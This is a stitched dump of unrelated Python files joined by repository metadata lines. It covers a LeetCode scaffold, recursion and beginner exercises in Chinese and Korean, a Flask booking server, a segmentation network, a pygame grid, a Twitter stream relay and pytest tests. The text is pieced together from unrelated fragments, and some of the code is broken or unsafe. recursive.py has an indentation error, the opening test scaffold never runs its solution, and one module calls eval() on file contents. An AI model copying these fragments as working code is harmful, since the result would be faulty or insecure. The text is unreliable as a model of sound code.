# NOTE(review): the empty argnames string and the missing parameter on
# test_solution mean this scaffold never exercises the solution - TODO fill in.
@pytest.mark.parametrize('', test_data_set)
def test_solution():
    solution = Solution()
| theodoresi/leetcode_solutions | python_version/485_max_consecutive_ones/max_consecutive_ones.py | max_consecutive_ones.py | py | 623 | python | en | code | 0 | github-code | 90 |
72452754218 | '''
递归函数
明确递归结束的条件
优点:写法简洁
缺点:效率不高
'''
# Infinite ("dead") recursion example - no base case:
# def my_function(x):
#     print(x)
#     my_function(x+1)
#
# my_function(1)
# Factorial computation
def jiechen_func(x):
    """Factorial of x (for x >= 1), computed recursively."""
    return x if x == 1 else x * jiechen_func(x - 1)
# 5! = 120
result = jiechen_func(5)
print(result)
'''
__name__
'''
def my_func():
    """Print this module's __name__ ('__main__' when run directly)."""
    print(__name__)
my_func()
if __name__ == "__main__":
print("这是函数的入口") | Fking1/studyPython | day8/recursive.py | recursive.py | py | 487 | python | en | code | 1 | github-code | 90 |
5833132865 | # 121
# 121: echo the letter with its case swapped.
user = input("알파벳 입력: ")
if user.islower():
    print(user.upper())
else:
    print(user.lower())
# 122
# Map a score onto grades A-E in 20-point bands.
score = input("점수 입력: ")
score = int(score)
if 81 <= score <= 100:
    print("grade is A")
elif 61 <= score <= 80:
    print("grade is B")
elif 41 <= score <= 60:
    print("grade is C")
elif 21 <= score <= 40:
    print("grade is D")
else:
    print("grade is E")
# 123
# Convert "<amount> <currency>" into Korean won using fixed rates.
환율 = {"달러": 1167,
      "엔": 1.096,
      "유로": 1268,
      "위안": 171}
money = input("입력: ")
num, currency = money.split()
print(float(num) * 환율[currency], "원")
# 124
# Print the largest of three integers.
num1 = input("input 1: ")
num2 = input("input 2: ")
num3 = input("input 3: ")
num1 = int(num1)
num2 = int(num2)
num3 = int(num3)
a = [num1, num2, num3]
print(max(a))
# 125
# Identify the mobile carrier from the phone-number prefix.
number = input("휴대폰 번호 입력: ")
num = number.split("-")[0]
if num == "011":
    com = "SKT"
elif num == "016":
    com = "KT"
elif num == "019":
    com = "LGU"
else:
    com = "알수없음"
print(f"당신은 {com} 사용자입니다.")
# 126
# Map the first three digits of a postal code onto a district.
zip_code = input("우편번호: ")
zip_code = zip_code[:3]
if zip_code in ["010", "011", "012"]:
    print("강북구")
elif zip_code in ["014", "015", "016"]:
    print("도봉구")
else:
    print("노원구")
# 127
# Gender from the first digit after the '-' in a resident registration number.
num = input("주민등록번호: ")
num = num.split("-")[1]
if num[0] == "1" or num[0] == "3":
    print("남자")
else:
    print("여자")
# 128
# Region check on the digits after the '-' of a resident registration number:
# codes 00-08 were issued in Seoul.
num = input("주민등록번호: ")
num = num.split("-")[1]
# Bug fix: num[1:3] is a string, so `0 <= num[1:3] <= 8` raised TypeError in
# Python 3; compare the numeric region code instead.
if 0 <= int(num[1:3]) <= 8:
    print("서울")
else:
    print("서울X")
# 129
# Resident-registration-number checksum: weighted digit sum (index 6 is the
# hyphen and is skipped); the check digit is the last character of
# str(11 - sum % 11), which also covers the 10/11 edge cases.
num = input("주민등록번호: ")
계산1 = int(num[0]) * 2 + int(num[1]) * 3 + int(num[2]) * 4 + int(num[3]) * 5 + int(num[4]) * 6 + \
      int(num[5]) * 7 + int(num[7]) * 8 + int(num[8]) * 9 + int(num[9]) * 2 + int(num[10])* 3 + \
      int(num[11])* 4 + int(num[12]) * 5
계산2 = 11 - (계산1 % 11)
계산3 = str(계산2)
if num[-1] == 계산3[-1]:
    print("유효한 주민등록번호입니다.")
else:
    print("유효하지 않은 주민등록번호입니다.")
# 130
# Bithumb ticker: call it a rising market if open + daily range beats the high.
import requests
btc = requests.get("https://api.bithumb.com/public/ticker/").json()['data']
변동폭 = float(btc['max_price']) - float(btc['min_price'])
시가 = float(btc['opening_price'])
최고가 = float(btc['max_price'])
if (시가+변동폭) > 최고가:
    print("상승장")
else:
    print("하락장")
| teddygood/Python-practice | Python_for_beginners/Python_for_beginners_121~130.py | Python_for_beginners_121~130.py | py | 2,337 | python | ko | code | 0 | github-code | 90 |
9322318415 | import json
from datetime import datetime
from flask import Flask, flash, redirect, render_template, request, url_for
def loadClubs():
    """Load and return the list of clubs from clubs.json."""
    with open("clubs.json") as source:
        payload = json.load(source)
    return payload["clubs"]
def loadCompetitions():
    """Load and return the list of competitions from competitions.json."""
    with open("competitions.json") as source:
        payload = json.load(source)
    return payload["competitions"]
app = Flask(__name__)
app.secret_key = "something_special"  # required for flash() messages
# Load the JSON-backed "database" once at import time (in-memory thereafter).
competitions = loadCompetitions()
clubs = loadClubs()
# Snapshot of server start time, used for competition-date comparisons.
actual_date = str(datetime.now())
# Landing page with the login form.
@app.route("/")
def index():
    return render_template("index.html")
@app.route("/showSummary", methods=["POST"])
def show_summary() -> str:
    """Look a club up by the posted email and show its welcome page; an
    unknown email re-renders the index page with an error message."""
    try:
        matching = [c for c in clubs if c["email"] == request.form["email"]]
        club = matching[0]
        return render_template(
            "welcome.html", club=club, competitions=competitions, date=actual_date
        )
    except IndexError:
        return render_template(
            "index.html", error_message="Sorry, that email wasn't found. Try again."
        )
# Booking page: only reachable for competitions that have not yet started.
@app.route("/book/<competition>/<club>")
def book(competition, club):
    """Render the booking form for (club, competition) when the competition
    date is still in the future; otherwise bounce back to the welcome page."""
    foundClub = [c for c in clubs if c["name"] == club][0]
    foundCompetition = [c for c in competitions if c["name"] == competition][0]
    # ISO-formatted date strings compare correctly as plain strings.
    if foundClub and foundCompetition and foundCompetition["date"] >= actual_date:
        return render_template(
            "booking.html", club=foundClub, competition=foundCompetition
        )
    else:
        flash("Something went wrong-please try again")
        # NOTE(review): `club` here is the raw name string, not the club dict
        # the welcome template presumably expects - confirm against the template.
        return render_template(
            "welcome.html", club=club, competitions=competitions, date=actual_date
        )
@app.route("/purchasePlaces", methods=["POST"])
def purchasePlaces():
competition = [c for c in competitions if c["name"] == request.form["competition"]][
0
]
club = [c for c in clubs if c["name"] == request.form["club"]][0]
placesRequired = int(request.form["places"])
placesCompetition = int(competition["numberOfPlaces"])
clubPoints = int(club["points"])
if placesRequired <= 0:
flash("Ne peut être inférieur ou égal à 0")
elif placesRequired > placesCompetition:
flash(
"Attention, vous avez selectionner plus de places que le nombre de place maximum."
)
elif placesRequired > 12:
flash("Vous ne pouvez pas réserver plus de 12 places à la fois.")
elif clubPoints < placesRequired*3:
flash("Vous n'avez pas assez de points")
else:
competition["numberOfPlaces"] = placesCompetition - placesRequired
club["points"] = int(club["points"]) - placesRequired*3
flash("Great-booking complete!")
return render_template(
"welcome.html", club=club, competitions=competitions, date=actual_date
)
@app.route('/displayboard')
def club_table():
    """Public leaderboard: every club with its current points."""
    return render_template('displayboard.html', clubs=clubs)
@app.route("/logout")
def logout():
return redirect(url_for("index"))
| PierreRtec/P11_Rondeau_Pierre | server.py | server.py | py | 2,999 | python | en | code | 0 | github-code | 90 |
18020834379 | # -*- coding: utf-8 -*-
# Count simple paths that start at vertex 1 and visit every vertex exactly
# once, via an iterative DFS that carries a per-branch visited mask.
N, M = map(int, input().split(' '))
graph = [[] for _ in range(N)]  # adjacency lists, 0-indexed
for _ in range(M):
    a, b = map(int, input().split(' '))
    a -= 1
    b -= 1
    graph[a].append(b)
    graph[b].append(a)
is_used = [False for _ in range(N)]
is_used[0] = True  # all paths start at vertex 0 (input vertex 1)
buf = [(0, is_used)]  # DFS stack entries: (current vertex, visited flags)
ans = 0
while buf:
    src, is_used = buf.pop()
    if all(is_used):
        ans += 1  # every vertex visited -> one complete path
    else:
        for dst in graph[src]:
            if not is_used[dst]:
                # Copy the flags so sibling branches stay independent.
                is_used2 = list(is_used)
                is_used2[dst] = True
                buf.append((dst, is_used2))
print(ans)
| Aasthaengg/IBMdataset | Python_codes/p03805/s351396896.py | s351396896.py | py | 593 | python | en | code | 0 | github-code | 90 |
10407682459 | import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torch.autograd import Variable
from .resnet import resnet101
class FCN(nn.Module):
    """DeepLab-style segmentation network: dilated ResNet-101 + ASPP head.

    NOTE(review): relies on the legacy PyTorch API (`nn.init.kaiming_normal`
    via initialize_weights, `F.upsample` in ASPP_Pooling).
    """
    def __init__(self, out_channels=19, output_stride=4, mode='bilinear'):
        super(FCN, self).__init__()
        self.output_stride = output_stride
        # Backbone with the classification head removed.
        self.ResNet = resnet101(output_stride=output_stride, pretrained=True)
        del self.ResNet.avgpool
        del self.ResNet.fc
        # FCN
        layer4_channels = 2048  # channels out of ResNet layer4
        self.aspp = ASPP_Module(inplanes=layer4_channels, output_stride=output_stride)
        aspp_channels = 1280  # 5 ASPP branches x 256 channels
        self.final_conv = nn.Sequential(nn.Conv2d(aspp_channels, 256, kernel_size=1, bias=False),
                                        nn.BatchNorm2d(256),
                                        nn.ReLU(),
                                        nn.Conv2d(256, out_channels, kernel_size=1, bias=True))
        initialize_weights(self.final_conv)
        # Upsample logits back toward the input resolution.
        self.upsample = nn.Upsample(scale_factor=output_stride, mode=mode)

    def forward(self, x):
        """Backbone -> ASPP -> 1x1 classifier -> (optional) upsampling."""
        x = self.ResNet(x)
        x = self.aspp(x)
        # Final stage:
        x = self.final_conv(x)
        if self.output_stride > 1:
            return self.upsample(x)
        else:
            return x
class ASPP_Module(nn.Module):
    """Atrous Spatial Pyramid Pooling: three dilated 3x3 convs (rates 6/12/18
    scaled by 16//output_stride), a 1x1 conv, and an image-level pooling
    branch.  BatchNorm is commented out in every branch.
    """
    def __init__(self, inplanes, output_stride=16):
        super(ASPP_Module, self).__init__()
        scale = 16//output_stride
        planes = 256
        dilation0 = scale*6
        self.conv0 = nn.Sequential( nn.Conv2d(inplanes, planes, kernel_size=3, stride=1, padding=dilation0, dilation=dilation0, bias=False))
                                    # nn.BatchNorm2d(planes))
        initialize_weights(self.conv0)
        dilation1 = scale*12
        self.conv1 = nn.Sequential( nn.Conv2d(inplanes, planes, kernel_size=3, stride=1, padding=dilation1, dilation=dilation1, bias=False))
                                    # nn.BatchNorm2d(planes))
        initialize_weights(self.conv1)
        dilation2 = scale*18
        self.conv2 = nn.Sequential( nn.Conv2d(inplanes, planes, kernel_size=3, stride=1, padding=dilation2, dilation=dilation2, bias=False))
                                    # nn.BatchNorm2d(planes))
        initialize_weights(self.conv2)
        self.conv3 = nn.Sequential( nn.Conv2d(inplanes, planes, kernel_size=1, stride=1, bias=False))
                                    # nn.BatchNorm2d(planes))
        initialize_weights(self.conv3)
        self.aspp_pooling = ASPP_Pooling(inplanes, planes)

    def forward(self, x):
        x0 = self.conv0(x)
        x1 = self.conv1(x)
        x2 = self.conv2(x)
        x3 = self.conv3(x)
        pool = self.aspp_pooling(x)
        # Concatenate: 1x1 branch, the three dilated branches, then pooling.
        return torch.cat([x3, x0, x1, x2, pool], dim=1)
class ASPP_Pooling(nn.Module):
    """Image-level branch: global average pool -> 1x1 conv -> upsample back."""
    def __init__(self, inplanes, planes):
        super(ASPP_Pooling, self).__init__()
        self.conv = nn.Sequential( nn.Conv2d(inplanes, planes, kernel_size=1, stride=1, bias=False))
                                    # nn.BatchNorm2d(planes))
        initialize_weights(self.conv)

    def forward(self, x):
        size = [x.size(2), x.size(3)]
        pool = F.avg_pool2d(x, size)  # pool the whole feature map to 1x1
        pool = self.conv(pool)
        # F.upsample is deprecated in modern PyTorch (F.interpolate replaces it).
        return F.upsample(pool, size=size, scale_factor=None, mode='bilinear')
def initialize_weights(*models):
    """Kaiming-normal init for Conv2d/Linear weights; BatchNorm2d weights
    are set to 1 and all biases to 0.

    Accepts any number of modules and walks each one recursively via
    ``model.modules()``.
    """
    for model in models:
        for module in model.modules():
            if isinstance(module, (nn.Conv2d, nn.Linear)):
                # nn.init.kaiming_normal (no trailing underscore) was removed
                # from modern PyTorch; use the in-place variant instead.
                nn.init.kaiming_normal_(module.weight)
                if module.bias is not None:
                    module.bias.data.zero_()
            elif isinstance(module, nn.BatchNorm2d):
                module.weight.data.fill_(1)
                module.bias.data.zero_()
| inferno-pytorch/neurofire | neurofire/models/fcn/fcn.py | fcn.py | py | 3,805 | python | en | code | 7 | github-code | 90 |
73775179495 | import torch
import matplotlib.pyplot as plt
import numpy as np
def plot_embedding_heatmap(embeddings):
    """Render a matrix of embedding vectors as a heatmap (one row per vector)."""
    n_rows = len(embeddings)
    n_cols = len(embeddings[0])

    fig, ax = plt.subplots()
    ax.imshow(embeddings)

    # One tick per embedding dimension (x) and per embedding vector (y).
    ax.set_xticks(np.arange(n_cols))
    ax.set_yticks(np.arange(n_rows))

    fig.tight_layout()
    plt.show()
26473666953 | # coding=UTF-8
import utils.Coor as coor
from utils.obj import Obj
from utils.radar import Radar
import random as rd
import json
from PyQt5.QtCore import QObject, pyqtSlot
import sys
class Radar_det(QObject):
    """Qt-exposed radar simulation: builds radars/targets from a scenario
    file, then runs one detection pass.  Slots return status strings to QML/JS.
    """
    def __init__(self,ip="127.0.0.1/6789",radardata=None,radar=None,obj=None,obj_num=0):
        super().__init__()
        self.ip = ip
        self.radardata = radardata  # raw scenario dict loaded from radar.txt
        self.radar = radar          # mapping id -> Radar instance
        self.obj = obj              # mapping index -> Obj (simulated target)
        self.obj_num = obj_num      # number of simulated targets

    @pyqtSlot(str,result=str)
    def radar_set(self,ip_p):
        """Initialise radars and random targets; returns a status message."""
        self.ip_p = ip_p
        # Set the coordinate origin (top-left corner of the map).
        ori = (35.958385067108026, 120.04422809586613)
        global ori_xy
        ori_xy = coor.millerToXY(ori)
        obj = {}
        obj_num = rd.randint(4,10)  # random number of targets
        #ori_value['obj_num'] = obj_num
        # print('目标的初始状态')
        #print('----------------')
        for i in range(obj_num):
            obj[i] = Obj()
            obj[i].get_random_value()
        #-------- load the scenario file ---------------
        # SECURITY NOTE(review): eval() on file contents executes arbitrary
        # code; the scenario file must be trusted.
        with open("radar.txt", "r") as f:  # open the file
            radardata = eval(f.read())  # read and evaluate the file
        # print('目标的初始状态')
        #print('----------------')
        radar = {}
        for k in range(len(radardata)):
            # Keys are expected to be 'radar1', 'radar2', ... in radar.txt.
            radar[k+1] = Radar(ori_xy, coor.to_origin(ori_xy, radardata['radar{}'.format(k+1)]))
        self.radardata = radardata
        self.radar = radar
        self.obj = obj
        self.obj_num = obj_num
        return "雷达初始化成功\n" + "雷达个数:" + str(len(radardata)) + "\n" + "目标个数:" + str(obj_num)
        # NOTE(review): the prints below are unreachable (after the return).
        print("雷达初始化成功")
        print("雷达个数",len(radardata))
        print("目标个数",obj_num)

    @pyqtSlot(result=str)
    def radar_detect(self):
        """Run a detection pass.  NOTE(review): returns inside the first loop
        iteration, so only radar 1 is ever run."""
        radardata = self.radardata
        radar = self.radar
        obj = self.obj
        obj_num = self.obj_num
        for k in range(len(radardata)):
            #print('radar{}:'.format(k+1))
            #print('----------------')
            return radar[k+1].run([obj[i].move() for i in range(obj_num)],self.ip_p)
| SikeX/unman_GUI | radar.py | radar.py | py | 2,147 | python | en | code | 1 | github-code | 90 |
23539363915 | #!/usr/bin/python3
import socket, sys, threading
import os, requests, json, time
# Read the Twitter API bearer token from the environment (never hard-code it).
bearer_token = os.environ.get('BEARER_TOKEN')# this is my bearer token
print("My Bearer Token Is Not None:{}".format(bearer_token!=None))
def create_url():
    """Return the Twitter v2 sampled-stream endpoint URL."""
    return "https://api.twitter.com/2/tweets/sample/stream"
def bearer_oauth(r):
    """
    Method required by bearer token authentication.

    Used as a `requests` auth callback: attaches the Authorization header
    (from the module-level bearer_token) and a User-Agent, then returns
    the mutated request object.
    """
    r.headers["Authorization"] = f"Bearer {bearer_token}"
    r.headers["User-Agent"] = "v2SampledStreamPython"
    return r
# Relay the Twitter sampled stream to up to two TCP clients (netcat-style).
if len(sys.argv) != 3:
    print("Usage: netcat.py HOSTNAME PORT", file=sys.stderr)
    sys.exit(-1)
HOST = sys.argv[1]
PORT = int(sys.argv[2])
#request the stream
response = requests.request("GET", create_url(), auth=bearer_oauth, stream=True)
print("Response Status Is:{}".format(response.status_code))
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.bind((HOST, PORT))
    s.listen()
    clients = []
    def accept():
        # Blocks until one client connects, then registers it.
        client, address = s.accept()
        print(f'New client @ {address}')
        clients.append(client)
    # Two acceptor threads -> at most two concurrent clients.
    threading.Thread(target=accept).start()
    threading.Thread(target=accept).start()
    while True:
        if len(clients) > 0:
            for response_line in response.iter_lines():
                if response_line:
                    data = json.loads(response_line)['data']['text']
                    for client in clients:
                        try:
                            print(f'Sending {data.rstrip()} to {client.getpeername()}')
                            client.sendall(data.encode())
                            #sleep for 0.5 second to slow down the stream
                            time.sleep(0.5)
                        except:
                            # NOTE(review): bare except; also mutates `clients`
                            # while iterating it, which can skip a client.
                            clients.remove(client)
    # NOTE(review): unreachable — the while loop above never exits, so this
    # status check should run before the loop to be effective.
    if response.status_code != 200:
        raise Exception(
            "Request returned an error: {} {}".format(
                response.status_code, response.text
            )
        )
| The-Sad-Zewalian/Hashtagor | Feed_Stream.py | Feed_Stream.py | py | 2,051 | python | en | code | 0 | github-code | 90 |
1881681576 | import unittest.mock as mock
from analyticsclient.client import Client
from ddt import data, ddt, unpack
from django.test import TestCase, override_settings
from analytics_dashboard.courses.presenters.programs import ProgramsPresenter
from analytics_dashboard.courses.tests.utils import (
CourseSamples,
ProgramSamples,
get_mock_programs,
)
@ddt
class ProgramsPresenterTests(TestCase):
    """Tests for ProgramsPresenter.get_programs filtering and defaulting."""

    def setUp(self):
        self.maxDiff = None  # show full diffs for the list comparisons
        super().setUp()

    @property
    def mock_api_response(self):
        '''
        Returns a mocked API response for programs including some null fields.
        '''
        return get_mock_programs()

    def get_expected_programs(self, program_ids=None, course_ids=None):
        '''Expected results with default values, sorted, and filtered to program_ids.'''
        if program_ids is None:
            programs = self.mock_api_response
        else:
            programs = [program for program in self.mock_api_response if program['program_id'] in program_ids]

        if course_ids is None:
            filtered_programs = programs
        else:
            filtered_programs = []
            for program in programs:
                for course_id in course_ids:
                    if course_id in program['course_ids']:
                        filtered_programs.append(program)
                        break

        # fill in with defaults
        for program in filtered_programs:
            for field in ProgramsPresenter.NON_NULL_STRING_FIELDS:
                if program[field] is None:
                    program[field] = ''

        # sort by title (untitled programs sort last via the `not` key)
        return sorted(
            filtered_programs,
            key=lambda x: (not x['program_title'], x['program_title']))

    @override_settings(CACHES={
        'default': {
            'BACKEND': 'django.core.cache.backends.dummy.DummyCache',
        }
    })
    # First element is the program_ids filter, second is the course_ids filter
    @data(
        [None, None],
        [[ProgramSamples.DEMO_PROGRAM_ID], None],
        [[ProgramSamples.DEMO_PROGRAM_ID, ProgramSamples.DEMO_PROGRAM2_ID], None],
        [None, [CourseSamples.DEMO_COURSE_ID]],
        [None, [CourseSamples.DEPRECATED_DEMO_COURSE_ID]],
        [None, [CourseSamples.DEMO_COURSE_ID, CourseSamples.DEPRECATED_DEMO_COURSE_ID]],
        [[ProgramSamples.DEMO_PROGRAM_ID], [CourseSamples.DEMO_COURSE_ID]],
        [[ProgramSamples.DEMO_PROGRAM2_ID], [CourseSamples.DEPRECATED_DEMO_COURSE_ID]],
        [[ProgramSamples.DEMO_PROGRAM_ID], [CourseSamples.DEMO_COURSE_ID, CourseSamples.DEPRECATED_DEMO_COURSE_ID]],
    )
    @unpack
    def test_get_programs(self, program_ids, course_ids):
        '''Test programs filtered from API response.'''
        presenter = ProgramsPresenter(Client('base_url'))
        with mock.patch('analyticsclient.programs.Programs.programs',
                        mock.Mock(return_value=self.mock_api_response)):
            actual_programs = presenter.get_programs(program_ids=program_ids, course_ids=course_ids)
            self.assertListEqual(actual_programs, self.get_expected_programs(program_ids=program_ids,
                                                                             course_ids=course_ids))
| openedx/edx-analytics-dashboard | analytics_dashboard/courses/tests/test_presenters/test_programs.py | test_programs.py | py | 3,256 | python | en | code | 72 | github-code | 90 |
22858855872 | import pygame
pygame.init()
class Grid():
    """Uniform rows x columns grid over the screen; maps pixels to cells."""

    color = (0, 0, 0)  # grid-line colour

    def __init__(self, screen_height, screen_width, rows, columns):
        self.rows = rows
        self.columns = columns
        # The screen must divide evenly into cells.  The original asserts
        # tested `% ... != 1`, which wrongly accepted most non-divisible
        # sizes; divisibility means remainder 0.
        assert screen_width % columns == 0, "modify screen width or noumber of columns"
        self.grid_width = screen_width//columns #dividing equal pixels
        assert screen_height % rows == 0, "modify screen height or noumber of rows"
        self.grid_height = screen_height//rows

    def clicked(self, pos):
        """Convert an (x, y) pixel position into a (row, column) cell index."""
        row_index = pos[1]//self.grid_height
        column_index = pos[0]//self.grid_width
        return (row_index, column_index)

    def drawGrid(self, screen):
        """Draw the horizontal and vertical grid lines onto *screen*."""
        for i in range(self.rows):
            pygame.draw.line(screen, Grid.color, (0, i*self.grid_height), (self.rows*self.grid_width, i*self.grid_height))
        for i in range(self.columns + 1):
            pygame.draw.line(screen, Grid.color, (i*self.grid_width, 0), (i*self.grid_width, self.columns*self.grid_width))
class Tiles():
    """One grid cell: colour/state used by the pathfinding visualiser."""

    def __init__(self, grid_width, grid_height, index, color1, color2, color3, color4, parent=None):
        self.width = grid_width
        self.height = grid_height
        self.index = index  # (row, column) position in the grid
        self.empty_color, self.wall_color, self.explored_color = color1, color2, color3
        self.recently_discovered_color = color4
        self.color = self.empty_color
        self.type = 1 # wall--0; empty--1; explored--2; newly discovered-- -1
        self.parent = parent  # back-pointer used to reconstruct a path
        self.text = None      # optional label drawn on the tile

    def makeWall(self):
        self.color = self.wall_color
        self.type = 0

    def makeNewlyDiscovered(self, parent):
        self.color = self.recently_discovered_color
        self.type = -1
        self.parent = parent

    def makeExplored(self):
        # Only numeric-typed tiles change; 'start'/'end' (strings) are kept.
        if type(self.type) == int:
            self.color = self.explored_color
            self.type = 0

    def makepath(self):
        self.color = (150,100,150)

    def makeStartEnd(self, type): # MAKE START/END ICONS
        self.color = (0, 0, 0)
        self.type = type # 'end' and 'start'

    def drawTile(self, screen):
        """Draw the tile rectangle (and its label, if any) onto *screen*."""
        x_cor = self.width*self.index[1]
        y_cor = self.height*self.index[0]
        pygame.draw.rect(screen, self.color, (x_cor, y_cor, self.width, self.height))
        if self.text:
            font = pygame.font.Font('Arcade.ttf', int(self.width*0.6))
            text = font.render(self.text, True, (255,255,255))
            screen.blit(text, (self.index[1]*self.width + 10, self.index[0]*self.height + 10))

    def render_text(self,screen):
        """Draw only the tile's label (same placement as drawTile)."""
        if self.text:
            font = pygame.font.Font('Arcade.ttf', int(self.width*0.6))
            text = font.render(self.text, True, (255,255,255))
            screen.blit(text, (self.index[1]*self.width + 10, self.index[0]*self.height + 10))
def render_label(start_tile, end_tile, screen):
    """Draw 'Start'/'end' labels at the two tiles.

    NOTE(review): blits at tile.index, which is a (row, column) pair, not a
    pixel coordinate — the labels land near the top-left corner; likely
    index should be multiplied by the tile size first.
    """
    font = pygame.font.Font('ARCADE.TTF', 10) # start/end font
    start_label = font.render('Start', True, (255,255,255))
    end_label = font.render('end', True, (255,255,255))
    screen.blit(start_label, start_tile.index)
    screen.blit(end_label, end_tile.index)
def main():
    """Event loop: build a 12x12 board; click-drag paints wall tiles."""
    #construction
    screen_width = 600
    screen_height = 600
    screen = pygame.display.set_mode((screen_width, screen_height))
    pygame.display.set_caption("Board")
    rows = 12
    columns = 12
    color1 = (255, 255, 255)  # empty
    color2 = (255, 0, 0)      # wall
    color3 = (0, 0, 255)      # explored
    color4 = (0, 255, 0)      # newly discovered
    #grid construction
    newGrid = Grid(screen_height, screen_width, rows, columns)
    # tiles construction
    tile_matrix = [[Tiles(newGrid.grid_width, newGrid.grid_height, (i, j), color1, color2, color3, color4)
                    for j in range(columns)] for i in range(rows)]
    makingWalls = False
    running = True
    while running:
        screen.fill((255, 255, 255))
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                running = False
            # get the clicked tiles
            if event.type == pygame.MOUSEBUTTONDOWN:
                makingWalls = True
            if event.type == pygame.MOUSEBUTTONUP:
                makingWalls = False
        # making walls while the button is held down
        if makingWalls:
            pos = pygame.mouse.get_pos()
            row_index, column_index = newGrid.clicked(pos)
            wall_tile = tile_matrix[row_index][column_index]
            wall_tile.makeWall()
        # draw grid and tile
        for i in tile_matrix:
            for j in i:
                j.drawTile(screen)
        newGrid.drawGrid(screen)
        pygame.display.update()
# main()  # NOTE(review): main() is never invoked; uncomment to run the board.
pygame.quit()
| yogendra-j/Path-Finding-Algorithm-visualizer | Board.py | Board.py | py | 4,656 | python | en | code | 0 | github-code | 90 |
42845617581 | import zmq
import time
start = time.time()
# Spin while a lock file exists or no file found
while True:
try:
open("/ceph/atate/transporter/lockfile", "r")
except IOError:
break
while True:
try:
open("/ceph/atate/transporter/testdata", "r")
except IOError:
continue
else:
print("found")
break
# read and pull lines of the file into list
import os
fsize = os.path.getsize("/ceph/atate/transporter/testdata")
gbytes = fsize / 1000 / 1000 / 1000
f = open("/ceph/atate/transporter/testdata", "r")
a = []
for line in f:
a.append(line)
end = time.time()
walltime = end - start
rate = gbytes/walltime
print ("CEPHFS (RECV): %f GB in %f sec rate=%f GB/s" % (gbytes,walltime,rate))
| tateap/transporter | tests/cephfs/recv.py | recv.py | py | 759 | python | en | code | 0 | github-code | 90 |
32040560158 | from datetime import datetime, timedelta
import pytest
from envinorma.models.classement import Regime
from envinorma.models.condition import Equal, Greater, Littler, OrCondition, Range
from envinorma.models.parameter import ParameterEnum
from envinorma.parametrization.consistency import (
_check_date_conditions_not_compatible,
_check_discrete_conditions_not_compatible,
_date_ranges_strictly_overlap,
_extract_date_range,
_ranges_strictly_overlap,
check_conditions_not_compatible,
)
from envinorma.parametrization.exceptions import ParametrizationError
def test_check_conditions_not_compatible():
    """A single Equal condition per parameter never raises."""
    for parameter in ParameterEnum:
        check_conditions_not_compatible([Equal(parameter.value, '')], parameter.value)
def test_check_discrete_conditions_not_compatible():
    """Disjoint regime conditions pass; overlapping ones raise ParametrizationError."""
    reg = ParameterEnum.REGIME.value
    _check_discrete_conditions_not_compatible([Equal(reg, Regime.E)], reg)
    _check_discrete_conditions_not_compatible([Equal(reg, Regime.E), Equal(reg, Regime.D)], reg)
    _check_discrete_conditions_not_compatible([Equal(reg, Regime.E), Equal(reg, Regime.D), Equal(reg, Regime.A)], reg)
    _check_discrete_conditions_not_compatible(
        [OrCondition(frozenset([Equal(reg, Regime.E), Equal(reg, Regime.D), Equal(reg, Regime.A)]))], reg
    )
    with pytest.raises(ParametrizationError):
        _check_discrete_conditions_not_compatible([Equal(reg, Regime.E), Equal(reg, Regime.E)], reg)
    with pytest.raises(ParametrizationError):
        _check_discrete_conditions_not_compatible(
            [OrCondition(frozenset([Equal(reg, Regime.E), Equal(reg, Regime.D)])), Equal(reg, Regime.D)], reg
        )
    with pytest.raises(ParametrizationError):
        _check_discrete_conditions_not_compatible(
            [OrCondition(frozenset([Littler(reg, Regime.E), Equal(reg, Regime.D)])), Equal(reg, Regime.A)], reg
        )
def test_extract_date_range():
    """Range/Equal/Littler/Greater conditions map to (lower, upper) bounds."""
    date_ = ParameterEnum.DATE_INSTALLATION.value
    dt_1 = datetime.now()
    dt_2 = dt_1 + timedelta(days=1)
    assert _extract_date_range(Range(date_, dt_1, dt_2)) == (dt_1, dt_2)
    assert _extract_date_range(Equal(date_, dt_1)) == (dt_1, dt_1)
    assert _extract_date_range(Littler(date_, dt_1)) == (None, dt_1)
    assert _extract_date_range(Greater(date_, dt_1)) == (dt_1, None)
def test_ranges_strictly_overlap():
    """Touching endpoints do not count as overlap; any interior overlap does."""
    assert not _ranges_strictly_overlap([])
    assert not _ranges_strictly_overlap([(0, 1)])
    assert not _ranges_strictly_overlap([(0, 0)])
    assert not _ranges_strictly_overlap([(0, 0), (0, 1)])
    assert not _ranges_strictly_overlap([(0, 0), (0, 1), (1, 2)])
    assert not _ranges_strictly_overlap([(0, 0), (0, 1), (1, 2), (3, 4)])
    assert not _ranges_strictly_overlap([(4, 5), (0, 0), (0, 1), (1, 2), (3, 4)])
    assert _ranges_strictly_overlap([(4, 5), (4.5, 4.5)])
    assert _ranges_strictly_overlap([(4, 5), (4.5, 10.5)])
    assert _ranges_strictly_overlap([(4, 5), (0, 10.5)])
    assert _ranges_strictly_overlap([(4, 5), (-10, 4.001)])
def test_date_ranges_strictly_overlap():
    """Same overlap semantics for datetime ranges; None means unbounded."""
    dt_1 = datetime.now()
    dt_2 = dt_1 + timedelta(days=1)
    dt_3 = dt_1 + timedelta(days=3)
    assert not _date_ranges_strictly_overlap([])
    assert not _date_ranges_strictly_overlap([(dt_1, dt_2)])
    assert not _date_ranges_strictly_overlap([(dt_1, dt_2), (dt_2, dt_3)])
    assert not _date_ranges_strictly_overlap([(dt_1, dt_2), (dt_2, dt_3), (None, dt_1)])
    assert not _date_ranges_strictly_overlap([(dt_1, dt_2), (dt_2, dt_3), (None, dt_1), (dt_3, None)])
    assert _date_ranges_strictly_overlap([(dt_1, dt_3), (dt_2, dt_3), (None, dt_1), (dt_3, None)])
    assert _date_ranges_strictly_overlap([(dt_1, dt_2), (dt_2, dt_3), (None, dt_3), (dt_3, None)])
    assert _date_ranges_strictly_overlap([(dt_1, dt_2), (dt_2, dt_3), (None, dt_1), (dt_2, None)])
    assert _date_ranges_strictly_overlap([(dt_1, dt_1), (None, None)])
def test_check_date_conditions_not_compatible():
    """Non-overlapping date conditions pass; overlapping ones raise."""
    date_ = ParameterEnum.DATE_INSTALLATION.value
    dt_1 = datetime.now()
    dt_2 = dt_1 + timedelta(days=1)
    cd_1 = Range(date_, dt_1, dt_2)
    cd_2 = Equal(date_, dt_1)
    cd_3 = Littler(date_, dt_1)
    cd_4 = Greater(date_, dt_2)
    _check_date_conditions_not_compatible([cd_1], date_)
    _check_date_conditions_not_compatible([cd_1, cd_2], date_)
    _check_date_conditions_not_compatible([cd_1, cd_3, cd_4], date_)
